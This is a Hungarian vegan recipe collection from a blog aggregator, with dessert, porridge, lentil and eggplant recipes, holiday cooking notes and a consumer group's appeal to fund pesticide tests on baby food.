A kukoricakását feldobhatjuk mindenféle finomsággal és máris "királyi" reggelink lesz. :-) Hozzávalók: 5 dl növényi tej 20 dkg kukoricadara 5-10 dkg nyírfacukor 2 tk. vaníliapor -- 1 csomag natúr gesztenye 3-4 ek. növényi tej datolyaszirup - ízlés szerint Elkészítés: Először a kukoricadarából főzünk kását: a növényi tejet feltesszük melegedni. Amikor felforrt, keverés közben hozzáadjuk a kukoricadarát, és nyírfacukorral ízesítjük. Kb. 10 perc alatt készre főzzük. Közben keverjük. Ez idő alatt a gesztenyemasszát kiolvasztjuk, összekeverjük a növényi tejjel és datolyasziruppal édesítjük. Majd, miután a kása kihűlt, egy tálat bevizezünk, és alulra leteszünk egy réteg kukoricakását, majd gesztenye következik, majd ismét kása és gesztenye. Amikor megdermedt, kiborítjuk és datolyasziruppal meglocsoljuk.
Vegán kakaós mandulás quinoa süti reggelire
2014. január 22. Zizi kalandjai
Ez egy olyan egyszerű, de nagyszerű és egyben különleges reggeli ötlet. A hétköznapi rohanások miatt (mindenki rohan hétköznap reggelente iskolába, munkába???) inkább hétvégére javaslom az elkészítését. Jó, ha igazán tudjuk élvezni egy csésze tea vagy kávé mellett.
Mivel a süti alapját quinoa és darált mandula adja, ezért ez nemcsak vegán, hanem gluténmentes is. Datolyával és egy kis almapürével van édesítve és noha egy bögre datolya van benne, egyáltalán nem mondható édesnek. Éppen, hogy érződik, hogy édes az íze, szóval ez amolyan egészséges, tápláló reggeli…
És ha már az édes íznél tartunk… egyelőre csak lélekben készülök a februári cukormentes kihívásra! És ti? Fizikailag még nem annyira. Úgy eszem a csokoládét, mintha soha többet nem tudnék majd enni életemben. Az édes dolgok terén igyekszem magam visszafogni, de valahogy a csokoládét nem tudom mostanában elengedni. Tömöm magamba a 70-80%-os csokikockákat, általában este vacsora után, de néha napközben is. Ha tudom magam fegyelmezni, akkor napközben inkább rágcsálok mandulát vagy eszem egy almát. Már látom előre, hogy február elején elvonási tüneteim lesznek csokoládé és édesség terén. Viszont várom már, hogy kicsit tisztuljon a szervezetem és tisztábban érezzem az ízeket. Meg persze márciustól sokkal kevesebb édességet fogok enni, mert nem fogom annyira kívánni… egészen novemberig, decemberig. Akkor majd újra belehúzok, hogy legyen mit kiméregteleníteni a szervezetemből jövő februárban. Remélem sokan velem tartotok majd!
És akkor jöjjön végre a recept!
Vegán kakaós mandulás quinoa süti
Hozzávalók egy kb. 20*20 cm-es kocka szilikon formához:
- 1 bögre quinoa
- 1 és 1/2 bögre mandulatej (rizs-, zab- és szójatej is használható)
- 1 bögre aszalt datolya, kimagozva
- 3/4 bögre darált mandula
- 1/2 bögre lenmag
- 1/2 bögre almapüré
- 1/3 bögre cukrozatlan kakaópor (karobpor is használható)
- 1/2 teáskanál Himalaya kristálysó
(A recepthez használt bögre 250 ml-es.)
Mossuk át a quinoát és tegyük egy lábasba 2 bögre vízzel. Főzzük meg kb. 15 perc alatt, hagyjuk hűlni 5-10 percig, majd villával keverjük át.
Melegítsük elő a sütőt 180 fokra. Ha nem szilikon formát használunk, akkor a tepsit béleljük ki sütőpapírral és tegyük félre. Én magam reszeltem le az almát baba almareszelővel, de ha nincs ilyenetek, akkor vehettek almapüré bébiételt is, ez is megfelelő.
Konyhai robotgépben pürésítsük a mandulatejet, datolyát, lenmagot, almapürét, kakaót és sót. Ezt a mixet öntsük egy tálba és jól keverjük össze a megfőtt quinoa-val, valamint 1/2 bögre darált mandulával. Öntsük a formába, kanállal simítsuk ki a tetejét és szórjuk meg a maradék 1/4 bögre darált mandulával. Süssük kb. 60 percig, amíg összeáll. Hagyjuk teljesen kihűlni, majd vágjuk kockákra és tálaljuk.
Szilvás-mézeskalácsos zabkásatorta
Tegnap este főzőkört tartottam - igazán vegyes és széles közönség előtt most debütáltam. Ugyan egy főiskola kollégiumában már tavaly ősszel egy féléven keresztül szintén tartottam főzőköröket, de itt tényleg minden korosztályból jöttek érdeklődők. Ezen a főzőkörön került bemutatásra az alábbi zabkásatorta, amit a főzőkör helyszínén mindenki megkóstolhatott.
A recept:
Hozzávalók:
- 1 adag zabpehely (pl. 2 marék)
- víz
- szilvaérés idején pár szem szilva, más évszakban aszalt szilva
- szilvalekvár
- növényi tej vagy víz
- édes ízhez ragaszkodva: egészséges édesítőszer (méz, gyümölcscukor, xilit és társai közül valamelyik, vagy aszalt datolya)
- mézeskalács fűszerkeverék
Elkészítés:
Ha apró szemű zabpelyhünk van, akkor a lábosban, amiben főzni fogjuk, kicsit megpirítjuk. Épp, amíg illata lesz a pirítástól. Majd felöntjük vízzel vagy növényi tejjel. Figyelve és olykor megkeverve addig főzzük, míg a zabpehely meg puhul.
Ha nagy szemű zabpehellyel dolgozunk, akkor ugyanígy megpiríthatjuk, de egy éjszakára akár be is áztathatjuk hideg vízbe. Másnap pedig felfőzzük. Az ilyen zabpelyhek több főzési időt igényelnek.
Az aszalt szilvát megáztattam egy kevés vízben, most ezt a vizet az aszalt szilvával együtt hozzáadtam a zabpehelyhez, így kevesebb további folyadékra volt szükség.
Amikor megfőtt a zabpehely, egy kerek tálba tettem az egyik felét, megkentem szilvalekvárral, majd rásimítottam a zabkása második felét. Pihentettem hűtőben néhány órát, majd a kerek formából (pl. tortaforma) kifordítottam a kész zabkása-tortát. Ha hasonlóan járunk el, mézeskalács fűszerkeverékkel megszórhatjuk és aszalt szilvát tehetünk a tetejére.
Kész is a torta, amit akár vendégváró süteménynek is elkészíthetünk, vagy a reggelinket felspécizhetjük ebben a formában. Nagy előnye, hogy elég gyorsan kész. Ehhez, a képen szereplő mennyiséghez, fél kiló zabpelyhet használtam fel.
(További kép a későbbiekben még kerül feltöltésre.)
Csicserikrémes padlizsán - lasagne
Ez a recept a német Vegán Kihívásos, Attila Hildmann legújabb könyvéből, a 'Vegan for Youth' c. könyvből származik. Maga a könyv külön is megér majd egy misét, pl. ebben már 60 napos a Kihívás, és nem csak 30 napos. Előzetesben annyit róla, hogy a receptek nagyon jók alapból, bár néha kicsit egyhangúak (non stop padlizsán, paradicsom, és édes burgonya szerepel bennük:). Az alapkoncepcióval viszont, miszerint most megmondja a tutit az örök fiatalság témakörében, némiképp melléfogott szerintem Attila Hildmann.... Eléggé összecsapott antréval, egy japán és egy olaszországi utazással gondolja alátámasztani abbéli koncepcióját, hogy a vegánság az örök élet titka....:) A koncepció még csak nem is lenne rossz:), de az indoklásai időnként olyan kis bárgyúan egyszerűek...:) Na, de visszatérve ehhez a recepthez, nagyon különleges, és ugyanakkor igen csak laktató ízvilág született! Próbáljátok ki!;) Csicserikrémes padlizsán - lasagne Elkészítési idő: kb. 35 perc Hozzávalók (2 főre): 1 padlizsán 1 gerezd fokhagyma, felaprítva 3 ek. olívaolaj tengeri só 250 g főtt csicseriborsó 50 g natúr kesudiókrém 1/2 tk. kurkuma 30 ml szénsavmentes ásványvíz 280 g főtt cékla (kb. 3 kisebb fej cékla) 1 ek. frissen préselt citromlé 1/2 tk. rizsszirup (agave szirup) őrölt fekete bors 1/4 cs. metélőhagyma, felaprítva Melegítsük elő a sütőt 220 fokra légkeveréssel. A padlizsánt lemossuk, és kb. 0,5 cm vastag szeletekre vágjuk. 2 ek. olívaolajat elkeverünk a felaprított fokhagymával és 1/4 tk. sóval, ezzel a keverékkel bedörzsöljük a padlizsánszeleteket, és 14 percig sütjük a középső sínre téve, egy sütőpapírral bélelt tepsiben. Közben a lecsöpögtetett csicseriborsó pürésítjük egy mixerben a kesudiókrémmel, a sóval, kurkumával és ásványvízzel. A főtt céklát kis kockákra vágjuk, és a citromlével, a maradék olívaolajjal, a rizssziruppal, sóval-borssal ízesítjük. A megsült padlizsánszeletekre rétegezzük emeletenként a csicserikrémet, a tetejére halmozzuk a céklát. A felaprított metélőhagymát a tetejére szórjuk.
Sokhagymás sült batáta zöldbabbal
2014. január 17. Éltető ételek
Mi fán terem a batáta? Hát nem fán, mivel ez egy zöldség gyökere. Más néven édesburgonya. Nemcsak a külföldi termést lehet beszerezni hazánkban, mivel a délkeleti országrészben is termesztik ezt az izletes zöldséget. Egyetlen közepes méretű édesburgonya fedezi a szervezetünknek szükséges napi A és C vitamint, valamint kálium, magnézium, réz és mangán szükségletét. Gazdag béta karotinban, és fehérje tartalma is magasabb más zöldségeknél. Semmi rokonságban nem áll a burgonyával, így táplálkozásilag is kedvezőbben használhatjuk. A burgonya maga a gumó, míg a batáta a gyökér. Glikémiás indexe alacsony, ezért cukorbetegeknek kifejezetten ajánlott. De ne keverjük a csicsókával, mert nem ugyanaz a két növény! Kellemesen sütőtök íze van, viszont az állaga sokkal jobb. Az édesburgonyát ne tartsuk hűtőben, mert a benne lévő cukor átalakul keményítővé. A hámozott, felszeletelt batátát felhasználásig tegyük vízbe, mert hamar oxidálódik. És most nézzük a receptet (2 fő) - 1 kg batáta - 2-3 vöröshagyma - 4-5 gerezd fokhagyma - 10 dkg zöldbab - kókuszolaj - kakukkfű, rozmaring, só, bors, kömény A batátát hámozzuk meg (ha nem bio, egyébként elég neki egy sikálás), és daraboljuk fel közepes kockára. A hagymákat szeleteljük fel. Egy jénait kenjük ki zsírral és tegyük bele a hagymás batátát. Fűszerezzük fel, és tegyük be a sütőbe, úgy 200 fokra. Fedjük le, hogy kicsit párolódni tudjon. Kb. 20 perc elteltével (mikor már kezd puhulni) tegyük hozzá a babot, és süssük együtt még úgy 20 percet. Tálalhatsz hozzá akár feta sajtot is, de önmagában is nagyon finom.
Karobos-kókuszos szelet szilvasziruppal
2014. január 17. Mindennapi ételeink
5 perc alatt kikeverhető, egészséges sütemény. Baba mellett mostanában csak ilyen édességekre van idő. Hozzávalók: 15 dkg finomliszt 10 dkg durumliszt 1 csomag foszfátmentes sütőpor 2-3 ek. karobpor 10 dkg nyírfacukor kb. 2,5 dl víz 6 ek. szójaolaj 5 dkg kókuszchips 10 dkg kókuszreszelék Tálaláshoz: Szilvaszirup, rizs habspray Elkészítés: A folyékony és a száraz alapanyagokat is külön-külön összekeverjük, majd egybeöntjük és olajozott, lisztezett tepsibe téve előmelegített sütőbe tesszük. 175-180 fokon 25-30 perc alatt kisütjük. Szilvasziruppal, szója vagy rizshabbal díszítve tálaljuk.
Gasztroajándék ötlet: Csilis olaj
Alapesetben nem ajánlanám a csilis olaj készítését. Csípősségéből adódóan sajnos irritálja a gyomrot, igazából kimondhatjuk, hogy egészségtelen kategóriába tartozhat ételként való fogyasztása, főleg, ha főzés közben keverjük az ételhez, és nem főzés után. DE vannak esetek, amikor pont a chilis olaj tud segíteni egészségünk javulásán. Először is említést kell tenni arról, hogy reumás panaszokat enyhíthet. Persze nem belsőleg fogyasztva. Felmelegített méhviasszal és néhány csepp illóolajjal (pl. fahéj, narancs) összekeverve masszázskrémet kapunk, amivel a fájdalmas területet rendszeres alkalmanként bemasszírozva enyhülést érhetünk el. Ehhez hasonlóan narancsbőrt is hasonlóan kezelhetünk. Ez esetben érdemes pl. intenzív edzés után lezuhanyozni, és a problémás bőrfelületet jó erővel bemasszírozni, fóliával betakarni és így pihentetni, izzasztani kb. fél órát. A fólia leszedését követően nem kell azonnal lezuhanyozni, lemosni a kezelt bőrfelületet. Legfeljebb, ha szükséges, áttörölni az olajos részt. Rendszeresen elvégezve szép bőrt eredményezhet. Azonban hozzá kell tennem, nagyon fontos egy ilyen "szertartás" alkalmával a sok-sok folyadék fogyasztása. Elsősorban víz és/vagy olyan tea, amely még jobban képes serkenteni az anyagcserét. (PL: csalán tea, vagy roibos tea)
A recept:
Hozzávalók:
- 1 díszes üveg
- extra szűz olívaolaj
- sok sok csilipaprika
Elkészítés:
A csilipaprikákat apró kis darabokra vágjuk. (Érdemes gumikesztyűben dolgozni, elkerülhetjük a kezünk és a szemünk találkozásának égető élményét.) Az üveget, amibe az olajat elkészítjük, kifertőtlenítjük. A száraz üvegbe szórjuk a felaprított csilipaprikákat, majd szép lassan felöntjük az olajjal. Dugóval vagy kupakkal lezárjuk, és néhány napig nem túl hideg, nem meleg, sötét helyen tároljuk. A gasztronómia világában használhatjuk levesekhez, szószokhoz, mártásokhoz utólag keverve . Az olajat felbontás után hűtőszekrényben tároljuk.
Ananászos-tökös torta
Házibuliban voltunk még novemberben, oda vittem ezt a tortát, hozzátenném, hogy a házigazda nem szimpatizál a sütőtökkel, édességem mégis sikert aratott! Annyira, hogy még a receptet is elkérték:) Ez a süti egy régi tortám átdolgozása. Annyit változtattam a recepten, hogy a krémbe a sütőtök mellé most nem almát, hanem ananászt tettem. Ananászos- tökös torta: Alap: 80 gramm lenmag 100 gramm mák 1 evőkanál kókuszzsír 20 datolya kiskanál fahéj csipet só Mákot és a lenmagot megőröljük kávédarálóban, vagy akinek profi turmixgépe van az abban is őrölheti. Beleöntjük a robotgépbe a kimagozott datolyát a megőrölt mákot és lenmagot a többi hozzávalóval és jól összedolgozzuk. A kapott masszát, kicsi csatos forma aljába nyomkodjuk. Ananászos- tökös krém: 15 datolya 1 kisebb ananász sütőtök kb. 1/3 annyi , mint az ananász darabka gyömbér, vagy szárítottból is jó egy késhegynyi 1 evőkanál kókuszzsír ( elhagyható) 1 narancs reszelt héja 1 kiskanál fahéj 2-3 evőkanál útifű maghéj Ha van profi turmixgépünk ami bírja a terhelést, akkor mindent beleönthetünk, és jól összedolgozzuk. Ha nincs akkor a robotgépünkbe jól összeaprítjuk a hozzávalókat, majd a csatos formába töltjük és elsimítjuk. Tetejét kókusz chipsszel és mozsárban összetört kakaóbabbal szórtam meg. Közepére fügét és körömvirágot tettem. ( Minden ehető, még a virág is:) Ha elég türelmesek vagyunk, érdemes a hűtőben pihentetni néhány órát, hogy szépen megdermedjen a kókuszzsír, és az útifű maghéj jól megzselésítse a krémet.
Mákos-vörösáfonyás tésztával töltött alma
2014. január 4. Mindennapi ételeink
Nagyon egyszerű, olcsó, gyors és finom nassolnivaló. És így az ünnepek után jólesik egy kis egészséges, nem túl édes desszert. Hozzávalók: 8 db közepes alma 25 dkg metélt tészta 20 dkg mák 10 dkg barna nádcukor 10 dkg vörösáfonya 2-3 ek. kókuszzsír Almánként 1-2 ek. szójajoghurt Elkészítés: Az almák tetejét levágjuk, majd kivájjuk a magházukat, úgy, hogy egyben maradjanak az almák. A tésztát kifőzzük, a mákot megdaráljuk, és a cukorral összekeverjük. Hozzákeverjük a kifőtt tésztához, beleszórjuk a vörösáfonyát, és a kivájt almabelekből hasznosítható részeket. Megtöltjük az almákat, mindegyik tetejére kanalazunk a szójajoghurtból, majd kókuszolajjal kikent tepsibe téve 180 fokon 25-30 perc alatt kisütjük.
Bébiétel teszt a Tudatos Vásárlók Egyesületével
2014. január 3. Zizi kalandjai
Hello 2014! Remélem mindenkinek jól kezdődött az új éve! Lassan kezdek visszarázódni a hétköznapokba, bár ezen a héten még egy kicsit lazítok, aztán jövő héttől indulhat a móka. Egy számomra fontos felhívást szeretnék megosztani veletek. A napokban kaptam egy emailt a Tudatos Vásárlók Egyesületétől, amelyben arról írtak, hogy egy új projektjükhöz támogatókat keresnek. Adakoztam tavaly év végén néhány szervezetnek, de a TVE új projektje nálam első olvasatra betalált, ugyanis bébiételeket szeretnének hivatalosan laboratóriumban bevizsgáltatni szakértő bevonásával és mivel ők egy nonprofit szervezet, ezért keresnek támogatókat, akik segítenek a projektjük megvalósításában. Egyből utaltam is nekik egy kisebb összeget, amely remélem hozzájárul ahhoz, hogy a bevizsgáltatás megtörténjen, mert úgy gondolom fontos tudnunk, hogy milyen minőségűek a boltok polcain található bébiételek. Bevallom két-három alkalommal már én is igénybe vettem őket, csakis bio répa-, sütőtök- és almapürét vettem eddig. Az alma egész finom, viszont a répának teljesen más az íze, mint, amit én készítek, a sütőtökről ne is beszéljünk… egyáltalán nincsen olyan finom édes íze, mint a saját magam által sütött töknek – almával keverve azért megette Ádi. Szóval íme a Tudatos Vásárlók Egyesületének felhívása… ha úgy gondoljátok számotokra is fontos egy ilyen eredményt tudni, akkor támogassátok a projektjüket! Adjuk össze, minden kicsi sokat számít! Kérjük, támogasd a bébiétel-tesztünket! A Tudatos Vásárlók Egyesülete csatlakozott az adjukossze.hu crowdfunding projektjéhez, ennek keretében olyan tesztre gyűjtünk adományokat, amelyet az egyesület önmagában nem tudna finanszírozni. Mit tesztelünk? A bébiételekben és babáknak szánt gyümölcslevekben laboratóriumi keretek között megvizsgáljuk a növényvédőszer-maradványok jelenlétét. Miért éppen bébiétel? Az elmúlt 5 év alatt a hivatalosan megvizsgált hazai termékek közül 2 babáknak szánt almalé és 6 bébiétel tartalmazott határértéken felüli mennyiségben növényvédőszer-maradékokat. Ezek károsíthatják a babák egészségét, jelenlétük a hatályos szabályok szerint gyakorlatilag nem is megengedett. Szeretnénk megtudni, mely termékek fogyaszthatók biztonsággal, előfordulnak-e permetszerrel szennyezett bébiételek a boltok polcain. Kérjük azokat a szülőket, nagyszülőket, akik szeretnék támogatni a bébiételek-és italok szermaradvány-vizsgálatát, hogy lehetőségeikhez mérten járuljanak hozzá ennek költségeihez. A Tudatos Vásárlók Egyesülete önkéntes munkában vállalja a vizsgálatra való összeg összegyűjtését, az eredmények széles körű terjesztését. Ha összegyűlik a kért összeg, elvégeztetjük 10 különböző termék akkreditált laboratóriumi vizsgálatát valamennyi releváns peszticidre (kb. 350 hatóanyag). A kapott eredményeket értelmezzük és magyarázatokkal látjuk el. Az eredményeket a TudatosVásárló.hu-n publikáljuk, így azok mindenki számára elérhetők lesznek. Ha esetleg kevesebb pénz gyűlne össze, akkor a vizsgált vegyszerek körét leszűkítjük a racionalitás határain belül. Tájékoztatásul: egy termék teljes körű vizsgálata kb. 80 000 Ft, a bébiételek-, italok beszerzésének ára kb. 4000 Ft, a szakértői díj (ha szükséges) megközelítőleg 150 000Ft. Az adományozáshoz csupán a bankkártyád és egy szabad fél perc szükséges! Kérjük, támogasd a projektünket! Köszönjük!
Karácsony és Szilveszter 2013., szemezgető:)
Hát, idén is elmúlt...:) Jó hosszú sütős-főzős időszak volt, mert a fiam szülinapja december közepén van, úgyhogy a Mikulás után mi már akkor kezdjük az ünneplést:). Szülinapi torta a suliba (idén snowboard-os, bár annyira nem volt felismerhető...:DD), aztán karácsonyi buli az oviban, majd a suliban, és utána jött még csak az igazi Karácsony.:) Sőt idén Szilveszterkor is családi vendégségbe mentünk, ahova szintén készültem. Ebben az ünneplős időszakban viszont volt néhány kifejezetten jól sikerült darab, amit már a gyerekek is többször szívesen fogyasztottak (na jó, persze az édességek voltak ezek legfőképp!:)). Lássuk, szépen sorban, mik készültek decemberben, aztán jönnek majd remélhetőleg a receptek is!:) Az Adventet ezzel a csokimázas márvány-kuglóffal indítottuk, amit a 8 éves fiam készített teljesen egyedül!:) A fehér hópelyhek és csillagok csak kókuszolajból, rizslisztből és cukorból vannak (dr. Oetker), a gyöngyökben hát ja, van némi aroma, khmkhm.. . A fiam szülinapi tortája a vegán Napfényes Cukrászatból, tej- és tojásmentes oroszkrém torta. Nekünk felnőtteknek nagyon ízlett, de a gyerekek annyira nem értékelték a a pirított mandulaszeleteket.:) Az óvodai és az iskolai Karácsonyra készültek ezek a mini muffinok, az abszolút Jolly Joker recept arra az esetre, amikor csak max. 35 percet tudunk tölteni a sütikészítéssel (a sütést és a díszítést is beleértve!:) A muffinok tésztája a sokszor bizonyított tej- és tojásmentes piskóta alap, amit ilyenkor muffinformákba kanalazok, étcsokimázzal megkenem és díszítem. A tésztát oviba - suliba úgy szoktam készíteni, hogy 50% fehér és 50% teljes kiőrlésű liszttel készítem. Az összes elfogyott!:) Fenyőmagos karfiolpástétom, egy olasz recept, kiváló előételnek Karácsonyra! Isteni finom volt!:) Reform gyümölcskenyér, ami nagyon natúr ízvilágú, teljesen cukormentes, igazi fehérjebomba! 1-2 szelet sok órára eltelít! A receptje a Vegán Kihívás receptjei között szerepelt, ITT, a 20. napnál! Az egyes számú és újból beigazolódott konklúzió, hogy mi nem vagyunk aprósütisek!...:))) Amikor Karácsony előtt beindul mindenhol a neten az aprósüti-dömping, meg vagyok győződve róla, hogy ezt imádjuk (om?:), ezért nekiállok. Aztán néhány darab után mégsem fogy, csak ott áll...:DDD Az idei próbálkozások közül viszont a mini islert megtartjuk, annak volt a legnagyobb sikere, és a gyerekek imádták csokiba mártogatni a linzer karikákat, könyékig elmerülve a csokiban...:)))) A linzerkarikákhoz az alaprecept a szokásos volt, 4 cm átmérőjű pogácsaszaggatóval szaggattuk, aztán házi baracklekvárral összeragasztottuk és végül csokiba mártottuk. A tányéron balról-jobbra van egy lekváros-darált diós csiga (még az volt a második legfinomabb), sima kis karikák, az isler, és mandulás-omlós kiflik. December 24-én ebédre: - kókusztejes kukoricakrémleves volt, nagyon finom, megtartjuk!:) - utána pedig a szokásos mákos guba. Szenteste a vegán verzió a vacsorán belül volt Kata kesudiósültje, ami továbbra is isteni finom, imába foglalom érte mindig a nevét!:)) Mellé köretnek céklamártás és agave szirupos, fűszeres sütőtök. Mmmmmmmm.....!:)) December 25-én pedig Anyukám készítette a vegán töltött káposztát. Desszertnek ugyancsak Kata rakott, vaníliapudingos, rizstejszínhabos piskótája készült, és a szokásos mézes krémes. Szilveszterkor vendégségbe mentünk, ahova a legtutibb hozzájárulásunk ez a vegán almás krémes volt!:) Az év legszuperebb felfedezése-ízvilága sütiben a számomra!:) Recept hamarosan!:) Ezen kívül vittem: - paradicsomos vöröslencsekrémet - csicseripástétomot - fűszeres magokat.
Újévi lencsefalatok (vegán, gluténmentes)
Újév első napján a hagyomány szerint lencsét szokás enni azért, hogy egész évben ne fogyjon el a pénz. Ha január elsején első étkezésként lencsét eszünk, soha nem ürül ki a pénztárcánk. Ugyanilyen szerencsét hoz, minden, apró szemű növény - kukorica, rizs, köles, más hüvelyesek. Nem tudom, menyi igazság rejtőzhet ezekben a hagyományokban. Másik érdekesség, hogy a 16. századig Magyarországon karácsonykor kezdődött az év.
Karácsony előtt közösségi közlekedésen utazva, akaratlanul is fültanúja voltam, amint valaki azt mondta, ők egy évben, csak egyszer esznek lencsét, újévkor. Az emberek általában lencsefőzeléket, lencsesalátát készítenek ekkor. Következzen most egy olyan recept, ami változatosabbá teheti lencse-evési szokásainkat. Talán nem csak újévre készítik el a konyhában forgolódók a lencsét, hiszen annyira értékes hüvelyes. Alacsony glikémiás indexe miatt mértékkel cukorbetegek is fogyaszthatják. Foszforban, káliumban, magnéziumban, vasban, kalciumban, cinkben, különféle B-vitaminokban gazdag étel, amelynek magas a fehérje tartalma és szervezetünk számára szükséges valamennyi aminosavat is tartalmazza.
A recept:
Hozzávalók:
- 0,5 kg lencse
- zabpehely
- 1 hagyma
- esetleg magok (én darált lenmagot tettem bele egy kanálnyit + szezámmagba hempergettem)
- só
- bors vagy borsikafű
- őrölt köménymag
- majoránna
- 6-8 gerezd fokhagyma
- őrölt pirospaprika
- babérlevél
- sütőpapír
- olaj
- uborka
- sárga és piros színű (kaliforniai) paprika
Elkészítés:
A lencsét miután alaposan átmostuk, néhány szál babérlevéllel és egy csapott evőkanál sóval feltesszük főzni - a víz bőségesen ellepje a lencséket. (Ha a közelben tartózkodunk, mehet nagyobb lángon fedő alatt, folyamatos ellenőrzés közben.) Persze, ha tehetjük, érdemes a lencsét előző este, vagy főzés előtt néhány órával beáztatni. Nem vészes, ha nincs rá módunk. Vannak, akik kuktában főzik, jól teszik.
Mindeközben előkészítjük a többi hozzávalót.
A pépessé főtt lencséhez (a babérleveleket kiszedjük belőle) felaprított hagymát és fokhagymát (vagy pépesre nyomott), egy kevés borsot vagy borsikafüvet és kb. egy csapzott evőkanálnyi őrölt köménymagot és ugyanennyi majoránnát, és valamennyi piros fűszerpaprikát keverünk. Majd annyi zabpelyhet teszünk hozzá, amennyit felvesz úgy, hogy gombócot tudjunk formálni belőle. Természetesen az a jó, ha a gombóc nem ragad a kezünkhöz. Vízbe mártott kézzel könnyebb formálni a golyócskákat. A gombócokat ezt követően pedig szezámmagba hempergetjük. Sütőpapírral bélelt tepsibe sorakoztatjuk őket, mindegyikre pár csepp olajat csepegtetünk, és kb. 30 perc alatt átsütjük. Érdemes úgy 20 perc után kicsit megforgatni a golyókat, hogy mindegyik részük szép, barnás színű legyen.
Mikor megsült, a megmosott uborkákat felkarikázzuk, majd a paprikákból kis szeleteket, darabokat vágunk. Fogvájóval pedig összeállítjuk a finom party-falatokat. A fogpiszkálót az uborka széléhez közelebbi részébe érdemes szúrni. Így nem esik le, ha felemeljük.
Mákos beigli másképp
Azoknak ajánlom ezt a receptet, akik nem bánják, ha a beigli idén nem a megszokott módon készül és néz ki. De hívhatjuk extrán mákos karácsonyi sütinek is. :) Hozzávalók a tésztához: 2 bögre teljes kiőrlésű tönkölybúza liszt 1 bögre graham liszt 1 kis marék darált mák 1 csomag sütőpor kevés növényi margarin kb. 2 dl növényi tej a töltelékhez: darált mák 1 alma 1 banán 1 nagy marék áztatott mazsola befőtt vagy fagyasztott meggy fél citrom és fél narancs leve vanília 1. A tésztához keverjük össze a száraz hozzávalókat, majd kb. 1.5 dl növényi tejben olvasszuk meg a margarint. Ezt adjuk hozzá a lisztekhez, keverjük el, majd annyi tejet adjunk még a tésztához, hogy egy könnyen formálható, gyúrható, nem ragacsos tésztát kapjunk. 2. Lereszeljük az almát, hozzáadjuk a citrom és narancs levét, majd hozzákeverjük a mákot. A pár órára beáztatott mazsolát kevés vízzel, egy banánnal, és kevés meggyel összeturmixoljuk. Ez fogja adni nekünk az édes ízérzést, és ettől lesz krémes. Hozzákeverjük a mákos almához. Egy kevés vaníliát is elkeverünk benne. 3. A tésztát egy kisebb és egy nagyobb nagyobb részre osztom. A nagyobb rész lesz a talpa, a kisebb a teteje. Sütőpapíron kerekre nyújtom, majd a sütőforma segítségével kellő nagyságúra körbevágom. Beleteszem a sütőpapírral együtt a formába, majd a maradék tésztát eldolgozom a széleken, peremet adva a sütinek. 4. Ráteszem a tölteléket, szépen eloszlatom. 5. A maradék tésztát is kerekre nyújtom, minél vékonyabbra, és ráillesztem a süti tetejére. Villával megszúrkáljuk picit, és mehet is a sütőbe. :) 6. 180 fokon készre sütjük kb. 25 perc alatt. Mindenkinek jó étvágyat és kellemes ünnepeket kívánok! Ani Tisztán, tudatosan!
Muskotályos aszalt szilva marcipán és csokoládé burokban
2013. december 18. La Veganista
Már csak néhány nap maradt karácsonyig. Itt az ideje, hogy legyártsuk az idei vegán gasztro ajándékokat. Idén egy egészen különleges bonbont ajánlok a figyelmetekbe, amit egyáltalán nem nehéz elkészíteni. A recept nagyon egyszerű, aszalt szilva, marcipán massza, vegán étcsoki és valamilyen jóféle alkohol kell hozzá. Ebben a receptben most egy kiváló minőségű Muscat Ottonel szőlőpálinkát használok, amit egy kedves barátom édesapjától kaptam kóstolóba. Tulajdonképpen ez ihlette a receptet. A szilva és a muskotály nagyon jól működnek egymással, de bátran használható rum, vagy akár maga a szilvapálinka is. Az eredmény egy igazán finom és különleges kézműves ajándék.
Hozzávalók (20db):
- 100g vegán étcsokoládé (forgácsoljuk, vagy vágjuk nagyon apró darabokra)
- 200g natúr házi marcipán
- 5db nagyobb, puha aszalt szilva (negyedeljük)
- 1dl Muscat Ottonel pálinka (vagy jó minőségű rum, szilva pálinka)
- kakaóvaj
Így készítsd el:
Az aszalt szilva darabokat minimum egy éjszakára (de akár több napra is) áztasd alkoholba, hogy legyen ideje magába szívni.
Amikor a szilva már átvette a pálinka aromáját, halászd ki és csöpögtesd le. (A maradék alkoholt ne dobjuk ki, mert nagyon finom, likőrösen édes ízt kap a szilvától.)
Amíg a szilvadarabokból kicsöpög a fölös alkohol, vedd elő a hűtőből a marcipánt. Hűvös, sima felületen nyújtsd vékonyra, négyzet alakúra, és egy pizzavágóval, vagy derelyeszaggatóval vágd fel, úgy, hogy 20 db négyzetet kapj, melyek közepére helyezz egy-egy szilvadarabot. Ezután a szilvákat bugyoláld be a marcipánba és tenyereid között alakítsd gömbformára.
Ha elkészültek a töltött marciángolyók, akkor nincs más hátra, mint megolvasztani a csokiforgácsot. Ehhez két edényre lesz szükséged. Egy kisebb lábasra, amiben a vizet forralod, és egy akkora edényre (nálam ez egy közepes méretű müzlis tálka volt), ami pont ráillik a vízforraló edényre. A csokis edény alja nem érhet a vízbe, az a lényeg, hogy a gőz olvassza meg a csokit.
A vizet takaréklángon melegítsd, mivel a csoki legfeljebb 45 °C-ig melegíthető, efölött megég, darabossá válik. Ha kicsit túlmelegedne, akkor további csokiforgács hozzákeverésével lehet hűteni. Az olvadt csokihoz célszerű kakaóvajat keverni, hogy a csokiburok fényes legyen. Olvasztás után hagyd, hogy visszahűljön kb. 30-32 °C-ra. Ekkor képződik belőle legkönnyebben a szép burok.
Sütőpapírra egy kiskanál segítségével készíts csokitalpakat a bonbonoknak. Ezután a marcipángolyókat félig merítsd az olvadt csokoládéba és ültesd mindegyiket egy-egy csokitalpra.
Hagyd megdermedni a csokoládét (ezt a hűtőbe téve gyorsíthatod, de ha a konyhádban nincs több 18 °C-nál akkor az a legideálisabb.) Dermedés után óvatosan fejtsd le a sütőpapírról a bonbonokat és újra mártsd a csokiba. Rakd vissza a sütőpapírra és hagyd, hogy megszilárduljon a csokiburok. Ha vastagabb burkot szeretnél, akkor még egy mártás vár rád.
A bonbonkészítés közben az olvasztott csoki megdermedhet, de újra és újra felolvaszthatod a fent leírt módszerrel. A maradék csokoládét sem kell kidobnod szilikon öntőformában töltve néhány csokiérme készülhet belőle.
Veggitas - chilis babbal ágyazva
2013. december 16. La Veganista
